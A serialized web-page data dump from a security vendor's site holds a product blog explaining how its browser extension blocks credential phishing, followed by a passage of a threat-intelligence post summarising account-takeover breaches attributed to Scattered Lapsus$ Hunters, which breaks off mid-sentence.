[{"data":1,"prerenderedAt":354624},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":95,"featuredblog":155,"blogs":1497,"use-case-page":353610},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8,59,76],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"stageModifiedSincePublish":6,"query":14,"data":15,"variations":50,"lastUpdated":51,"firstPublished":52,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":54,"meta":55,"rev":58},1742213002749,"efff2a27faf4408e9f908eba4b5542fe","inductive-automation","1c6207a5f24948ab82d4a0b17f251193","published",[],{"testimonial":16,"description":43,"type":19,"link":44,"title":47,"testimonialLink":48,"image":49},{"@type":17,"id":18,"model":19,"value":20},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":21,"folders":22,"createdDate":23,"id":18,"name":24,"modelId":25,"published":13,"data":26,"variations":30,"lastUpdated":31,"firstPublished":32,"testRatio":33,"createdBy":34,"lastUpdatedBy":34,"meta":35,"rev":42},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":27,"jobTitle":28,"quote":24,"image":29},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,1,"ST0tXQM8slWpFrmioqKHmENB2qe2",{"kind":36,"lastPreviewUrl":37,"breakpoints":38,"hasAutosaves":41},"data","",{"small":39,"medium":40},640,768,true,"n0c69wxpcx","Join the industry's top security minds as they break down the browser attack landscape.",{"url":45,"text":46},"https://pushsecurity.com/webinar/state-of-browser-security","Save Your Spot","State of Browser Attacks Series","/customer-stories/inductive-automation","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe94fca10aa7b46ac8052b7ea22de54cd",{},1776257019270,1742221533648,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2",[],{"breakpoints":56,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},320,"brpv9ps5x2",{"createdDate":60,"id":61,"name":62,"modelId":12,"published":13,"query":63,"data":64,"variations":69,"lastUpdated":70,"firstPublished":71,"testRatio":33,"createdBy":53,"lastUpdatedBy":72,"folders":73,"meta":74,"rev":58},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner",[],{"type":65,"url":66,"text":67,"link":68},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,"jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":36,"lastPreviewUrl":37,"breakpoints":75,"hasAutosaves":41},{"xsmall":57,"small":39,"medium":40},{"createdDate":77,"id":78,"name":79,"modelId":12,"published":13,"stageModifiedSincePublish":6,"query":80,"data":81,"variations":89,"lastUpdated":90,"firstPublished":91,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":92,"meta":93,"rev":58},1742208469288,"6763051b201f44a0838c6400c580ca67","Resource highlight",[],{"image":82,"type":83,"description":84,"link":85,"title":88},"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9","resource","Learn about the latest techniques being used in the wild.",{"url":86,"text":87},"/resources/browser-attacks-report","Download now","Report: 2026 Browser Attack Techniques",{},1776255866789,1742208570400,[],{"kind":36,"lastPreviewUrl":37,"breakpoints":94,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},{"createdDate":96,"id":97,"name":98,"modelId":99,"published":13,"query":100,"data":101,"variations":145,"lastUpdated":146,"firstPublished":147,"testRatio":33,"createdBy":34,"lastUpdatedBy":148,"folders":149,"meta":150,"rev":154},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"ctaText":102,"text":103,"url":37,"blocks":104,"state":141},"ewrererw","testrfesssssssssss",[105,129],{"@type":106,"@version":107,"id":108,"component":109,"responsiveStyles":119},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":110,"tag":110,"options":111,"isRSC":118},"TopBannerContent",{"text":112,"ctaText":46,"url":45,"mainText":113,"cta":116},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks",{"content":114,"fontSize":115},"\u003Cp>New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks\u003C/p>","text-base",{"content":117,"fontSize":115,"url":45},"\u003Cp>\u003Cstrong style=\"font-weight:700;\">Save Your Spot\u003C/strong>\u003C/p>\n",null,{"large":120},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"marginTop":126,"marginBottom":126,"fontSize":127,"fontWeight":128},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":130,"@type":106,"tagName":131,"properties":132,"responsiveStyles":136},"builder-pixel-dloynz89rbq","img",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":137},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},"block","hidden","none",{"deviceSize":142,"location":143},"large",{"path":37,"query":144},{},{},1775137295127,1774968080803,"ax7YYfD0OCeqT1Vxxv1G4FUbqVr1",[],{"breakpoints":151,"hasLinks":6,"kind":152,"lastPreviewUrl":153,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"component","https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","vvf0k1j1pre",{"__typename":156,"image":157,"blogPost":160,"blogPost2":517},"FeaturedBlog",{"fileName":158,"url":159},"AdobeStock_174230211.jpeg","https://images.ctfassets.net/y1cdw1ablpvd/4PgCBFQD5MAodC4i3EzlJ7/8438bcb18750412badf40654bdec178c/AdobeStock_174230211.jpeg",{"sys":161,"content":163,"title":496,"synopsis":497,"publishedDate":498,"slug":499,"tagsCollection":500,"authorsCollection":510},{"id":162},"4bYO5rVy9n2OO3vtMVQeda",{"json":164},{"nodeType":165,"data":166,"content":167},"document",{},[168,177,200,216,223,230,234,242,249,304,311,320,323,330,337,344,351,358,376,382,389,396,413,419,426,433,440,447,454,457,464,484,490],{"nodeType":169,"data":170,"content":171},"heading-1",{},[172],{"nodeType":173,"value":174,"marks":175,"data":176},"text","All phishing eventually leads to the browser",[],{},{"nodeType":178,"data":179,"content":180},"paragraph",{},[181,185,196],{"nodeType":173,"value":182,"marks":183,"data":184},"The best attack detection methods are those that focus on ",[],{},{"nodeType":186,"data":187,"content":189},"hyperlink",{"uri":188},"https://pushsecurity.com/blog/our-design-philosophy-detecting-what-matters/",[190],{"nodeType":173,"value":191,"marks":192,"data":195},"detecting indicators that are difficult for attackers to change or obfuscate",[193],{"type":194},"underline",{},{"nodeType":173,"value":197,"marks":198,"data":199},". ",[],{},{"nodeType":178,"data":201,"content":202},{},[203,207,212],{"nodeType":173,"value":204,"marks":205,"data":206},"For a credential phishing attack to succeed, the victim ",[],{},{"nodeType":173,"value":208,"marks":209,"data":211},"has",[210],{"type":194},{},{"nodeType":173,"value":213,"marks":214,"data":215}," to enter their password into a webpage. There’s no two-ways about it, attackers cannot change this. ",[],{},{"nodeType":178,"data":217,"content":218},{},[219],{"nodeType":173,"value":220,"marks":221,"data":222},"So it stands to reason that, if you can detect this user behavior, and block them from entering their password, then you can stop phishing. ",[],{},{"nodeType":178,"data":224,"content":225},{},[226],{"nodeType":173,"value":227,"marks":228,"data":229},"This is exactly what Push does.",[],{},{"nodeType":231,"data":232,"content":233},"hr",{},[],{"nodeType":235,"data":236,"content":237},"heading-2",{},[238],{"nodeType":173,"value":239,"marks":240,"data":241},"Most anti-phishing tools are easily bypassed",[],{},{"nodeType":178,"data":243,"content":244},{},[245],{"nodeType":173,"value":246,"marks":247,"data":248},"Other anti-phishing tools rely on detecting elements of the attack that attackers can change and hide, such as domains or the webpage contents. Attackers use tricks to evade these detection, like:",[],{},{"nodeType":250,"data":251,"content":252},"unordered-list",{},[253,264,274,284,294],{"nodeType":254,"data":255,"content":256},"list-item",{},[257],{"nodeType":178,"data":258,"content":259},{},[260],{"nodeType":173,"value":261,"marks":262,"data":263},"Using Cloudflare Workers to block automatic analysis of their phishing site",[],{},{"nodeType":254,"data":265,"content":266},{},[267],{"nodeType":178,"data":268,"content":269},{},[270],{"nodeType":173,"value":271,"marks":272,"data":273},"Hacking a Wordpress blog to get a reputable domain that passes domain checks ",[],{},{"nodeType":254,"data":275,"content":276},{},[277],{"nodeType":178,"data":278,"content":279},{},[280],{"nodeType":173,"value":281,"marks":282,"data":283},"Using redirects and rotating the URLs delivered to the victim to bypass link analysis",[],{},{"nodeType":254,"data":285,"content":286},{},[287],{"nodeType":178,"data":288,"content":289},{},[290],{"nodeType":173,"value":291,"marks":292,"data":293},"Randomizing the HTML title for the web page to bypass blocklists ",[],{},{"nodeType":254,"data":295,"content":296},{},[297],{"nodeType":178,"data":298,"content":299},{},[300],{"nodeType":173,"value":301,"marks":302,"data":303},"One-time phishing links that only work the first time they are clicked",[],{},{"nodeType":178,"data":305,"content":306},{},[307],{"nodeType":173,"value":308,"marks":309,"data":310},"Push is putting an end to this game of cat and mouse, by keeping it really simple; you can’t phish someone who can’t put their password into a phishing page. ",[],{},{"nodeType":312,"data":313,"content":319},"embedded-entry-block",{"target":314},{"sys":315},{"id":316,"type":317,"linkType":318},"6AwOZSpqaChmeksnj4SyWE","Link","Entry",[],{"nodeType":231,"data":321,"content":322},{},[],{"nodeType":235,"data":324,"content":325},{},[326],{"nodeType":173,"value":327,"marks":328,"data":329},"Domain-binding passwords",[],{},{"nodeType":178,"data":331,"content":332},{},[333],{"nodeType":173,"value":334,"marks":335,"data":336},"If you’re familiar with how passkeys are domain-bound, then think of what Push does as domain-binding passwords. We pin the password to its legitimate domain(s) and then don’t allow it to be entered into any webpage on any other domain. ",[],{},{"nodeType":178,"data":338,"content":339},{},[340],{"nodeType":173,"value":341,"marks":342,"data":343},"But just because you’ve stopped your users from being phished doesn’t mean you don’t want to know when attackers are attempting to phish your users and how. ",[],{},{"nodeType":178,"data":345,"content":346},{},[347],{"nodeType":173,"value":348,"marks":349,"data":350},"Push still inspects webpages to see if attackers are rendering cloned app login pages in the browser or if known AitM and BitM toolkits are being used. This way you don’t lose visibility of the unsuccessful attacks that are targeting your users. Think of it as a handy second and third layer of defense.",[],{},{"nodeType":178,"data":352,"content":353},{},[354],{"nodeType":173,"value":355,"marks":356,"data":357},"Lets run through a quick before and after example:",[],{},{"nodeType":235,"data":359,"content":360},{},[361,365,372],{"nodeType":173,"value":362,"marks":363,"data":364},"Scenario 1: An attacker attempts to phish an employee that ",[],{},{"nodeType":173,"value":366,"marks":367,"data":371},"doesn’t",[368,369],{"type":194},{"type":370},"bold",{},{"nodeType":173,"value":373,"marks":374,"data":375}," have Push deployed to their browser.",[],{},{"nodeType":312,"data":377,"content":381},{"target":378},{"sys":379},{"id":380,"type":317,"linkType":318},"2CbGMUSJsP1mNeHkmpLl6N",[],{"nodeType":178,"data":383,"content":384},{},[385],{"nodeType":173,"value":386,"marks":387,"data":388},"Here, an attacker hacks a Wordpress blog to get a reputable domain and then runs a phishing toolkit on the webpage. They email one of your employees a link to it. Your SWG / email scanning solution inspects it in a sandbox but the phish kit detects this and redirects to a benign site so that it passes the inspection. ",[],{},{"nodeType":178,"data":390,"content":391},{},[392],{"nodeType":173,"value":393,"marks":394,"data":395},"Your user gets the email with the link and is now free to interact with the phishing page. They enter their credentials plus MFA code into the page and voila! The attacker steals them and is able to compromise the user’s account.  ",[],{},{"nodeType":235,"data":397,"content":398},{},[399,403,409],{"nodeType":173,"value":400,"marks":401,"data":402},"Scenario 2: An attacker attempts to phish an employee that ",[],{},{"nodeType":173,"value":404,"marks":405,"data":408},"does",[406,407],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":411,"data":412}," have Push deployed to their browser. ",[],{},{"nodeType":312,"data":414,"content":418},{"target":415},{"sys":416},{"id":417,"type":317,"linkType":318},"77smnID1woCfFJrJPyTvKY",[],{"nodeType":178,"data":420,"content":421},{},[422],{"nodeType":173,"value":423,"marks":424,"data":425},"This time, the attacker uses the same phishing toolkit and domain from the first example. But in reality, they don’t have to send it to your employee using email, instead, they could use LinkedIn messenger, Slack, Teams, or any application that allows employees to communicate with each other. ",[],{},{"nodeType":178,"data":427,"content":428},{},[429],{"nodeType":173,"value":430,"marks":431,"data":432},"Like before, the user receives the link, opens it and starts to enter their credentials into the webpage. This time though, the Push browser extension inspects the webpage running in the user's browser. Push observes that the webpage is a login page and the user is entering their password into the page.",[],{},{"nodeType":178,"data":434,"content":435},{},[436],{"nodeType":173,"value":437,"marks":438,"data":439},"The first detection Push makes is checking that the password the user is entering matches the domain that password is pinned to. Since it doesn't match, based on this detection alone the user is automatically redirected to a blocking page. An important point to make here is that the password never leaves the user’s browser and the check is made using a shortened salted hash of the password.   ",[],{},{"nodeType":178,"data":441,"content":442},{},[443],{"nodeType":173,"value":444,"marks":445,"data":446},"The second detection Push makes is that the rendered web app is using a cloned app login page. The third detection is that a phishing toolkit is running in the web app code. ",[],{},{"nodeType":178,"data":448,"content":449},{},[450],{"nodeType":173,"value":451,"marks":452,"data":453},"In this particular scenario these second and third detections serve as useful context for understanding the nature of the phishing attack. But both will still redirect to a blocking page if they are triggered in isolation of the other phishing detections. ",[],{},{"nodeType":231,"data":455,"content":456},{},[],{"nodeType":169,"data":458,"content":459},{},[460],{"nodeType":173,"value":461,"marks":462,"data":463},"We don’t just stop phishing attacks",[],{},{"nodeType":178,"data":465,"content":466},{},[467,471,480],{"nodeType":173,"value":468,"marks":469,"data":470},"We also detect other identity-related attack techniques used to compromise user accounts. That includes credential stuffing, password spraying and session hijacking using stolen session tokens. If you want to learn more about how Push helps you to detect and defeat common identity attack techniques, ",[],{},{"nodeType":186,"data":472,"content":474},{"uri":473},"https://pushsecurity.com/demo/",[475],{"nodeType":173,"value":476,"marks":477,"data":479},"book some time with one of our team",[478],{"type":194},{},{"nodeType":173,"value":481,"marks":482,"data":483},".  ",[],{},{"nodeType":312,"data":485,"content":489},{"target":486},{"sys":487},{"id":488,"type":317,"linkType":318},"2JSmYDaiAciOx7Z1MRuJlA",[],{"nodeType":178,"data":491,"content":492},{},[493],{"nodeType":173,"value":37,"marks":494,"data":495},[],{},"Detecting and blocking phishing attacks in the browser","How Push detects and blocks phishing attempts in the browser – explained in less than two minutes. ","2024-10-23T00:00:00.000Z","detecting-and-blocking-phishing-attacks-in-the-browser",{"items":501},[502,506],{"sys":503,"name":505},{"id":504},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":507,"name":509},{"id":508},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":511},[512],{"fullName":513,"jobTitle":514,"profilePicture":515},"Alex Henshall","Product Team",{"url":516},"https://images.ctfassets.net/y1cdw1ablpvd/2rz3Pre3b1MexPIQ4hzPUe/0ef8a092b7e7df00fbce3f7d1ccb96d1/Alex_Henshall.jpeg",{"sys":518,"content":520,"title":1480,"synopsis":1481,"publishedDate":1482,"slug":1483,"tagsCollection":1484,"authorsCollection":1490},{"id":519},"2sFCww9xnI8okIxhtOaiY1",{"json":521},{"nodeType":165,"data":522,"content":523},{},[524,531,538,545,548,556,563,570,576,583,589,609,616,628,631,639,646,662,669,681,687,690,698,706,712,721,741,750,757,766,785,794,801,810,843,852,859,868,886,892,901,908,917,960,963,971,980,1000,1009,1016,1025,1058,1064,1073,1080,1086,1089,1097,1106,1113,1173,1179,1182,1190,1199,1206,1212,1215,1223,1230,1237,1307,1314,1377,1384,1387,1395,1402,1409,1415,1418,1426,1433,1440,1447],{"nodeType":178,"data":525,"content":526},{},[527],{"nodeType":173,"value":528,"marks":529,"data":530},"The biggest cybersecurity story this year (so far) has been the emergence of “Scattered Lapsus$ Hunters” and their record-breaking worldwide hacking spree. ",[],{},{"nodeType":178,"data":532,"content":533},{},[534],{"nodeType":173,"value":535,"marks":536,"data":537},"Scattered Lapsus$ Hunters is part of “The Com”, the name for the broad community of English-speaking cybercriminals with international criminal connections — including with nation-state sponsored groups. They are also known to collaborate with a range of cybercrime “as-a-Service” organizations for phishing, initial access, ransomware, and more. ",[],{},{"nodeType":178,"data":539,"content":540},{},[541],{"nodeType":173,"value":542,"marks":543,"data":544},"It’s difficult to pin down exactly who the individuals are that make up this criminal collective. But what is known is their MO — making money through extortion by means of account takeover, mass data theft, and ransomware deployment. ",[],{},{"nodeType":231,"data":546,"content":547},{},[],{"nodeType":169,"data":549,"content":550},{},[551],{"nodeType":173,"value":552,"marks":553,"data":555},"How did we get here? ",[554],{"type":370},{},{"nodeType":178,"data":557,"content":558},{},[559],{"nodeType":173,"value":560,"marks":561,"data":562},"Earlier this year, the threat group known to most analysts as Scattered Spider (also tracked as 0ktapus, Octo Tempest, Scatter Swine, Muddled Libra, and UNC3944) re-emerged after a series of arrests in late 2024. ",[],{},{"nodeType":178,"data":564,"content":565},{},[566],{"nodeType":173,"value":567,"marks":568,"data":569},"This group has been active in peaks and troughs over the years, but are mainly known for high-profile ransomware attacks on Caesars and MGM Resorts in 2024. ",[],{},{"nodeType":312,"data":571,"content":575},{"target":572},{"sys":573},{"id":574,"type":317,"linkType":318},"1Vt269d7n6IGMzOrJs1FDx",[],{"nodeType":178,"data":577,"content":578},{},[579],{"nodeType":173,"value":580,"marks":581,"data":582},"Scattered Spider hit the headlines again in April 2025 with attacks on UK retailers Marks & Spencer and Co-op, which resulted in significant, prolonged disruption, and a serious downstream impact on the retail supply chain. ",[],{},{"nodeType":312,"data":584,"content":588},{"target":585},{"sys":586},{"id":587,"type":317,"linkType":318},"3kvcGV2zZZUPnM8IK04Y1O",[],{"nodeType":178,"data":590,"content":591},{},[592,596,605],{"nodeType":173,"value":593,"marks":594,"data":595},"It didn’t stop there, though. What followed was a wide-scale campaign targeting Salesforce customers, with the attackers claiming to have stolen ",[],{},{"nodeType":186,"data":597,"content":599},{"uri":598},"https://www.bleepingcomputer.com/news/security/shinyhunters-claims-15-billion-salesforce-records-stolen-in-drift-hacks/",[600],{"nodeType":173,"value":601,"marks":602,"data":604},"over 1.5 billion records from 1000+ companies",[603],{"type":194},{},{"nodeType":173,"value":606,"marks":607,"data":608}," across multiple verticals, including heavyweights like Google, Cloudflare, Workday, Adidas, FedEx, Disney, LVMH, and many more.",[],{},{"nodeType":178,"data":610,"content":611},{},[612],{"nodeType":173,"value":613,"marks":614,"data":615},"Around this time, the attackers began to refer to themselves as part of a wider collective, assuming the moniker “Scattered Lapsus$ Hunters” (a mash-up of names given by analysts and self-adopted by attackers — Scattered Spider, ShinyHunters, and Lapsus$).",[],{},{"nodeType":178,"data":617,"content":618},{},[619,623],{"nodeType":173,"value":620,"marks":621,"data":622},"The most significant breach this year to-date impacted Jaguar Land Rover. A ransomware attack resulted in months of disruption that directly impacted the UK’s GDP, with the government underwriting a $1.5B loan to alleviate the supply chain impact. ",[],{},{"nodeType":173,"value":624,"marks":625,"data":627},"In fact, this was the most economically consequential cyber attack yet recorded in a G7 economy. ",[626],{"type":370},{},{"nodeType":231,"data":629,"content":630},{},[],{"nodeType":169,"data":632,"content":633},{},[634],{"nodeType":173,"value":635,"marks":636,"data":638},"2025 wasn’t a one-off",[637],{"type":370},{},{"nodeType":178,"data":640,"content":641},{},[642],{"nodeType":173,"value":643,"marks":644,"data":645},"The developments through 2025 have presented a stronger picture than ever before that cybercriminal operations are heavily interlinked. Groups overlap considerably, and individuals freely move between different cells. ",[],{},{"nodeType":178,"data":647,"content":648},{},[649,653,658],{"nodeType":173,"value":650,"marks":651,"data":652},"When we scratch beneath the surface, this is evident in the tactics, techniques and procedures (TTPs) used by these attackers — even stretching as far back as 2021 with the initial rise of Lapsus$. This is not an accident. ",[],{},{"nodeType":173,"value":654,"marks":655,"data":657},"The TTPs used show a conscious move by attackers to move away from environments that are well-protected by traditional security tools. ",[656],{"type":370},{},{"nodeType":173,"value":659,"marks":660,"data":661},"This means avoiding targeting endpoints with malware, and not relying on software-based exploits. Instead, these attackers look to take over apps and services directly over the internet. ",[],{},{"nodeType":178,"data":663,"content":664},{},[665],{"nodeType":173,"value":666,"marks":667,"data":668},"Most of the time, this is as simple as logging in to a SaaS app, or an enterprise SSO account (e.g. Microsoft, Okta, or Google) and dumping the data. For attackers that want to take it further, they can abuse the sprawl of interconnected apps that make up modern business IT, seeking out specific data or exploitable functionality. Or, they can leverage internet-accessible management portals to chart a path back to your on-premise assets, giving them everything they need to pivot toward more conventional methods such as ransomware deployment. ",[],{},{"nodeType":178,"data":670,"content":671},{},[672,676],{"nodeType":173,"value":673,"marks":674,"data":675},"When we look at historical breaches, the pattern is clear. ",[],{},{"nodeType":173,"value":677,"marks":678,"data":680},"Not one of the attacks attributed to Scattered Lapsus$ Hunters, or its predecessors, started with an endpoint or network attack — they all began with account takeover. ",[679],{"type":370},{},{"nodeType":312,"data":682,"content":686},{"target":683},{"sys":684},{"id":685,"type":317,"linkType":318},"6poP5VM2ARrEvwKEG42HgK",[],{"nodeType":231,"data":688,"content":689},{},[],{"nodeType":169,"data":691,"content":692},{},[693],{"nodeType":173,"value":694,"marks":695,"data":697},"TTP breakdown: Analysing the top “Scattered Lapsus$ Hunters” breaches since 2021",[696],{"type":370},{},{"nodeType":235,"data":699,"content":700},{},[701],{"nodeType":173,"value":702,"marks":703,"data":705},"Phishing and stolen credentials",[704],{"type":370},{},{"nodeType":312,"data":707,"content":711},{"target":708},{"sys":709},{"id":710,"type":317,"linkType":318},"4SNOanDIdGZsvRRnMYQVSo",[],{"nodeType":178,"data":713,"content":714},{},[715],{"nodeType":173,"value":716,"marks":717,"data":720},"EA Games (2021)",[718,719],{"type":370},{"type":194},{},{"nodeType":178,"data":722,"content":723},{},[724,728,737],{"nodeType":173,"value":725,"marks":726,"data":727},"Attackers used stolen session cookies to log into EA’s Slack instance, purchased on a criminal forum. Combined with ",[],{},{"nodeType":186,"data":729,"content":731},{"uri":730},"https://pushsecurity.com/blog/phishing-slack-persistence/",[732],{"nodeType":173,"value":733,"marks":734,"data":736},"social engineering via Slack",[735],{"type":194},{},{"nodeType":173,"value":738,"marks":739,"data":740},", this was used to steal 750GB of data, including video game source code. ",[],{},{"nodeType":178,"data":742,"content":743},{},[744],{"nodeType":173,"value":745,"marks":746,"data":749},"Nvidia (2022)",[747,748],{"type":370},{"type":194},{},{"nodeType":178,"data":751,"content":752},{},[753],{"nodeType":173,"value":754,"marks":755,"data":756},"Attackers used stolen credentials to steal 1TB of data from Nvidia’s internal shares, including a significant amount of sensitive information about the designs of Nvidia graphics cards, source code, and the usernames and passwords of more than 71,000 Nvidia employees.",[],{},{"nodeType":178,"data":758,"content":759},{},[760],{"nodeType":173,"value":761,"marks":762,"data":765},"Microsoft (2022)",[763,764],{"type":370},{"type":194},{},{"nodeType":178,"data":767,"content":768},{},[769,773,781],{"nodeType":173,"value":770,"marks":771,"data":772},"Attackers used stolen credentials combined with SIM swapping and ",[],{},{"nodeType":186,"data":774,"content":776},{"uri":775},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/mfa_fatigue/description.md",[777],{"nodeType":173,"value":778,"marks":779,"data":780},"MFA fatigue",[],{},{"nodeType":173,"value":782,"marks":783,"data":784}," attacks to steal Azure DevOps source code — leaked a 9GB archive of Microsoft source code – including ~90% of Bing and 45% of Cortana code. ",[],{},{"nodeType":178,"data":786,"content":787},{},[788],{"nodeType":173,"value":789,"marks":790,"data":793},"T-Mobile (2022)",[791,792],{"type":370},{"type":194},{},{"nodeType":178,"data":795,"content":796},{},[797],{"nodeType":173,"value":798,"marks":799,"data":800},"Attackers used stolen credentials to establish initial access, coupled with social engineering T-Mobile staff into approving the attacker’s device for VPN access. This resulted in source code being stolen from over 30,000 repositories. ",[],{},{"nodeType":178,"data":802,"content":803},{},[804],{"nodeType":173,"value":805,"marks":806,"data":809},"Snowflake (165 customers) (2024)",[807,808],{"type":370},{"type":194},{},{"nodeType":178,"data":811,"content":812},{},[813,817,826,830,839],{"nodeType":173,"value":814,"marks":815,"data":816},"Attackers targeted ",[],{},{"nodeType":186,"data":818,"content":820},{"uri":819},"https://pushsecurity.com/blog/snowflake-retro/",[821],{"nodeType":173,"value":822,"marks":823,"data":825},"165 Snowflake customers",[824],{"type":194},{},{"nodeType":173,"value":827,"marks":828,"data":829}," using stolen credentials from credential breaches dating back as far as 2020. Due to widespread MFA gaps and the presence of ",[],{},{"nodeType":186,"data":831,"content":833},{"uri":832},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/ghost_logins/description.md",[834],{"nodeType":173,"value":835,"marks":836,"data":838},"ghost logins",[837],{"type":194},{},{"nodeType":173,"value":840,"marks":841,"data":842},", attackers were able to simply log in to individual customer tenants, dump the data, and use it to extort the companies. In total, 9 public victims were named following the breach, with over 1B breached customer records. ",[],{},{"nodeType":178,"data":844,"content":845},{},[846],{"nodeType":173,"value":847,"marks":848,"data":851},"PowerSchool (2024)",[849,850],{"type":370},{"type":194},{},{"nodeType":178,"data":853,"content":854},{},[855],{"nodeType":173,"value":856,"marks":857,"data":858},"Attackers gained access to a community-focused customer support portal, PowerSource, using compromised credentials and stole data using an \"export data manager\" customer support tool, stealing the data of 62.4 million students and 9.5 million teachers. PowerSchool paid an undisclosed ransom fee, but hackers returned later to extort schools and individuals separately anyway.",[],{},{"nodeType":178,"data":860,"content":861},{},[862],{"nodeType":173,"value":863,"marks":864,"data":867},"Red Hat (2025)",[865,866],{"type":370},{"type":194},{},{"nodeType":178,"data":869,"content":870},{},[871,875,882],{"nodeType":173,"value":872,"marks":873,"data":874},"Attackers breached Red Hat’s GitLab instance via a compromised account — the result of ",[],{},{"nodeType":186,"data":876,"content":877},{"uri":832},[878],{"nodeType":173,"value":835,"marks":879,"data":881},[880],{"type":194},{},{"nodeType":173,"value":883,"marks":884,"data":885}," providing a backdoor to access an otherwise secure, SSO-connected account. Stolen data included approximately 800 Customer Engagement Reports (CERs), authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure. ",[],{},{"nodeType":312,"data":887,"content":891},{"target":888},{"sys":889},{"id":890,"type":317,"linkType":318},"G1V7d5Dvevmr9p0YXElPX",[],{"nodeType":178,"data":893,"content":894},{},[895],{"nodeType":173,"value":896,"marks":897,"data":900},"Discord (2025)",[898,899],{"type":370},{"type":194},{},{"nodeType":178,"data":902,"content":903},{},[904],{"nodeType":173,"value":905,"marks":906,"data":907},"Attackers compromised a Zendesk customer support account, stealing 1.6TB of data. The hackers say this consisted of roughly 8.4 million tickets affecting 5.5 million unique users, and that about 580,000 users contained payment information.",[],{},{"nodeType":178,"data":909,"content":910},{},[911],{"nodeType":173,"value":912,"marks":913,"data":916},"SoundCloud, MatchGroup, Crunchbase, Betterment... (2026)",[914,915],{"type":370},{"type":194},{},{"nodeType":178,"data":918,"content":919},{},[920,924,932,936,944,948,956],{"nodeType":173,"value":921,"marks":922,"data":923},"Scattered Lapsus$ Hunters have already claimed several public victims in 2026, with over 60 million breached records. ",[],{},{"nodeType":186,"data":925,"content":927},{"uri":926},"https://www.bleepingcomputer.com/news/security/shinyhunters-claim-to-be-behind-sso-account-data-theft-attacks/",[928],{"nodeType":173,"value":929,"marks":930,"data":931},"SoundCloud, Betterment, Crunchbase",[],{},{"nodeType":173,"value":933,"marks":934,"data":935}," and ",[],{},{"nodeType":186,"data":937,"content":939},{"uri":938},"https://www.bleepingcomputer.com/news/security/match-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match/",[940],{"nodeType":173,"value":941,"marks":942,"data":943},"MatchGroup",[],{},{"nodeType":173,"value":945,"marks":946,"data":947}," have all reported breaches this month, powered by a brand ",[],{},{"nodeType":186,"data":949,"content":951},{"uri":950},"https://pushsecurity.com/blog/unpacking-the-latest-slh-campaign/",[952],{"nodeType":173,"value":953,"marks":954,"data":955},"new real-time-operated AiTM phishing kit",[],{},{"nodeType":173,"value":957,"marks":958,"data":959}," targeting Okta, Entra, and Google SSO accounts. This is a developing situation, with more victims expected to be announced publicly soon.",[],{},{"nodeType":231,"data":961,"content":962},{},[],{"nodeType":235,"data":964,"content":965},{},[966],{"nodeType":173,"value":967,"marks":968,"data":970},"Vishing and help desk scams",[969],{"type":370},{},{"nodeType":178,"data":972,"content":973},{},[974],{"nodeType":173,"value":975,"marks":976,"data":979},"MGM Resorts & Caesars (2023)",[977,978],{"type":370},{"type":194},{},{"nodeType":178,"data":981,"content":982},{},[983,987,996],{"nodeType":173,"value":984,"marks":985,"data":986},"MGM Resorts and Caesars were hit with twin breaches in 2023. Attackers socially engineered help desk personnel to take over accounts with Super Administrator privileges within MGM Resorts’ 